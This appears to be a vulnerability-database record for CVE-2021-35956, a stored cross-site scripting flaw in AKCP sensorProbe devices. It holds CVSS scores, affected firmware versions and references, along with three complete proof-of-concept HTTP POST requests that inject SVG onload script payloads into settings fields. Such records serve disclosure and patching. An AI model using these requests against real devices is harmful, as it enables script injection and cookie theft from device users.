var-202106-1093
Vulnerability from variot
Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. AKCP sensorProbe is a platform-independent environmental and safety monitoring equipment of AKCP company in the United States. Just assign an IP address and connect to the embedded web server. The correct verification of client data, an attacker can use this vulnerability to lure users to click to execute client code to steal user cookie credentials.
1) Stored Cross-Site Scripting via System Settings
POST /system?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 114 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/system?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
_SA01=System+Namer&_SA02=RDC&_SA03=Namexss>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
2) Stored Cross-Site Scripting via Email Settings
POST /mail?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/mail?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=xxss>&_PS05_4=&sbt2=Save
3) Stored Cross-Site Scripting via Sensor Description
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/senswatr?index=0&time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CPCookie=sensors=400 Connection: close
_WT00-IX=">xss>&_WT03-IX=2&sbt1=Save
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202106-1093",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "sensorprobe4",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe8-x60",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe2",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe8",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe8-x20",
"scope": "lt",
"trust": 1.0,
"vendor": "akcp",
"version": "sp480-20210624"
},
{
"model": "sensorprobe \u003csp480-20210624",
"scope": null,
"trust": 0.6,
"vendor": "akcp",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Tyler Butler",
"sources": [
{
"db": "PACKETSTORM",
"id": "163343"
}
],
"trust": 0.1
},
"cve": "CVE-2021-35956",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2021-35956",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2021-46654",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2021-35956",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-35956",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2021-46654",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202106-1985",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-35956",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. AKCP sensorProbe is a platform-independent environmental and safety monitoring equipment of AKCP company in the United States. Just assign an IP address and connect to the embedded web server. The correct verification of client data, an attacker can use this vulnerability to lure users to click to execute client code to steal user cookie credentials. \n\n\n1) Stored Cross-Site Scripting via System Settings \n\nPOST /system?time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 114\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/system?time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n_SA01=System+Namer\u0026_SA02=RDC\u0026_SA03=Name\u003csvg/onload=alert`xss`\u003e\u0026_SA04=1\u0026_SA06=0\u0026_SA36=0\u0026_SA37=0\u0026sbt1=Save\n\n2) Stored Cross-Site Scripting via Email Settings \n\nPOST /mail?time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 162\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/mail?time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n\n_PS03=test@test.com\u0026_PS04=test@test.com\u0026_PS05_0=test@test.com\u0026_PS05_1=test@test.comr\u0026_PS05_3=\u003csvg/onload=alert`xxss`\u003e\u0026_PS05_4=\u0026sbt2=Save\n\n3) Stored Cross-Site Scripting via Sensor Description\n\nPOST /senswatr?index=0\u0026time=32e004c941f912 HTTP/1.1\nHost: [target]\nContent-Length: 55\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://[target]\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://[target]/senswatr?index=0\u0026time=32e004c941f912\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: CPCookie=sensors=400\nConnection: close\n\n_WT00-IX=\"\u003e\u003csvg/onload=alert`xss`\u003e\u0026_WT03-IX=2\u0026sbt1=Save\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-35956"
},
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-35956",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "163343",
"trust": 1.8
},
{
"db": "CNVD",
"id": "CNVD-2021-46654",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "50080",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-35956",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"id": "VAR-202106-1093",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
}
]
},
"last_update_date": "2024-08-14T15:38:01.739000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "CVE-2021-35956",
"trust": 0.1,
"url": "https://github.com/tcbutler320/CVE-2021-35956 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-35956"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://tbutler.org/2021/06/28/cve-2021-35956"
},
{
"trust": 1.7,
"url": "https://www.akcp.com/support-center/customer-login/sensor-probe-firmware-changelog/"
},
{
"trust": 1.7,
"url": "http://www.akcp.in.th/downloads/firmwares/sp480-20210624.zip"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/163343/akcp-sensorprobe-spx476-cross-site-scripting.html"
},
{
"trust": 1.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-35956"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/50080"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://github.com/tcbutler320/cve-2021-35956"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://[target]/mail?time=32e004c941f912"
},
{
"trust": 0.1,
"url": "http://[target]/senswatr?index=0\u0026time=32e004c941f912"
},
{
"trust": 0.1,
"url": "http://[target]"
},
{
"trust": 0.1,
"url": "https://www.akcp.com/"
},
{
"trust": 0.1,
"url": "https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/"
},
{
"trust": 0.1,
"url": "http://[target]/system?time=32e004c941f912"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"date": "2021-06-30T00:00:00",
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"date": "2021-07-02T15:30:25",
"db": "PACKETSTORM",
"id": "163343"
},
{
"date": "2021-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"date": "2021-06-30T12:15:07.683000",
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"date": "2021-07-06T00:00:00",
"db": "VULMON",
"id": "CVE-2021-35956"
},
{
"date": "2021-07-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-1985"
},
{
"date": "2021-07-06T13:20:33.377000",
"db": "NVD",
"id": "CVE-2021-35956"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AKCP sensorProbe cross-site scripting vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-46654"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "163343"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-1985"
}
],
"trust": 0.7
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…